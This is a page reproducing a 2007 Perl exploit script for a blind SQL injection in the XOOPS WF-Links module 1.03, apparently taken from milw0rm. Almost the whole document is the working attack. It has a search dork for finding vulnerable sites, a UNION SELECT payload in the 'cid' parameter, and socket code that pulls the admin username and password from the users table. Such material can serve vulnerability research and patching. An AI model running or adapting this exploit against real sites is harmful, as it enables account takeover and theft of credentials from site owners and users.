XOOPS Module WFLinks 1.03 cid Remote SQL Injection Exploit by h3m4n

VIEWS: 27 PAGES: 2

									                           XOOPS Module WFLinks 1.03 cid Remote SQL Injection Exploit                                                              Page 1/2
  1     #!/usr/bin/perl
  2     #[Script Name: XOOPS Module WF−Links <= 1.03 (cid) Remote BLIND SQL Injection Exploit
  3     #[Coded by   : ajann
  4     #[Author     : ajann
  5     #[Contact    : :(
  6     #[Dork       : inurl:/modules/wflinks (63.900 Result)
  7     #[Down&Info : http://www.xoops.org/modules/repository/singlefile.php?cid=40&lid=1511
  8     #[$$         : Free
  9     #[..         : ajann,Turkey
  10
  11
  12    use IO::Socket;
  13    if(@ARGV < 1){
  14    print "
  15    [========================================================================
  16    [// XOOPS Module WF−Links <= 1.03 (cid) Remote BLIND SQL Injection Exploit
  17    [//        Usage: exploit.pl [target]
  18    [//        Example: exploit.pl victim.com
  19    [//        Example: exploit.pl victim.com
  20    [//            Vuln&Exp : ajann
  21    [========================================================================
  22    ";
  23    exit();
  24    }
  25    #Local variables
  26    $kapan = "/*";
  27    $server = $ARGV[0];
  28    $server =~ s/(http:\/\/)//eg;
  29    $host = "http://".$server;
  30    $port = "80";
  31    $file = "/modules/wflinks/viewcat.php?cid=";
  32
  33    print "Script <DIR> : ";
  34    $dir = <STDIN>;
  35    chop ($dir);
  36
  37    if ($dir =~ /exit/){
  38    print "−− Exploit Failed[You Are Exited] \n";
  39    exit();
  40    }
  41
  42    if ($dir =~ /\//){}
  43    else {
  44    print "−− Exploit Failed[No DIR] \n";
  45    exit();
  46     }
  47
  48    print "User ID (uid): ";
  49    $id = <STDIN>;
  50    chop ($id);
  51
  52    $target = "−1%20union%20select%202,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass)%20from%20xoops_us
ajann                                                                                                                                               04/05/2007
                         XOOPS Module WFLinks 1.03 cid Remote SQL Injection Exploit                                             Page 2/2
        ers%20where%20uid%20like%20".$id.$kapan;
  53    $target = $host.$dir.$file.$target;
  54
  55    #Writing data to socket
  56    print "+**********************************************************************+\n";
  57    print "+ Trying to connect: $server\n";
  58    $socket = IO::Socket::INET−>new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
  59    print $socket "GET $target HTTP/1.1\n";
  60    print $socket "Host: $server\n";
  61    print $socket "Accept: */*\n";
  62    print $socket "Connection: close\n\n";
  63    print "+ Connected!...\n";
  64    #Getting
  65    while($answer = <$socket>) {
  66    if ($answer =~ /username:(.*?)pass/){
  67    print "+ Exploit succeed! Getting admin information.\n";
  68    print "+ −−−−−−−−−−−−−−−− +\n";
  69    print "+ Username: $1\n";
  70    }
  71
  72    if ($answer =~ /password:(.*?)<\/a>/){
  73    print "+ Password: $1\n";
  74    }
  75
  76    if ($answer =~ /Syntax error/) {
  77    print "+ Exploit Failed : ( \n";
  78    print "+**********************************************************************+\n";
  79    exit();
  80    }
  81
  82    if ($answer =~ /Internal Server Error/) {
  83    print "+ Exploit Failed : ( \n";
  84    print "+**********************************************************************+\n";
  85    exit();
  86    }
  87      }
  88
  89    # milw0rm.com [2007−04−05]




ajann                                                                                                                            04/05/2007

								
To top